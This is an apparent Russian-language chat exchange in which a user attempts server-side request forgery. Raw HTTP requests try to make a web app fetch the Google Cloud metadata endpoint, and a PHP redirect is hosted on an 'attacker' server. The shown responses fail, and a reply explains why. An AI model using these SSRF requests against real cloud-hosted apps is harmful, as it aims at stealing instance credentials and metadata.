Google
url=http://169.254.169.254/computeMetadata/
_________________________________________________
Ответ:
{"Contents":"v1/\n"}
_____________________________________
Ок, продолжаем
POST /fetch HTTP/2
Host: topkek
Metadata-Flavor: Google
url=http://169.254.169.254/computeMetadata/v1/
___________________________________________________
Ответ:
{"Contents":"Missing required header: Metadata-Flavor\n"}
_______________________________________
Ок, понял, принял, пытаемся в редирект.
POST /fetch HTTP/2
Host: topkek
Metadata-Flavor: Google
url=http://attacker/kek
где kek
<?php
header('Location: http://169.254.169.254/computeMetadata/v1/');
header("Metadata-Flavor: Google");
?>
____________________________________________________
Ответ тот же:
{"Contents":"Missing required header: Metadata-Flavor\n"}
___________________________________
Где я обосрался? ЧЯДНТ?
то, что ты присылаешь этот хедер веб аппке, не значит, что во время реквеста на метадата эндпоинт он будет в запросе. не думаю, что что-то можно сделать
Обсуждают сегодня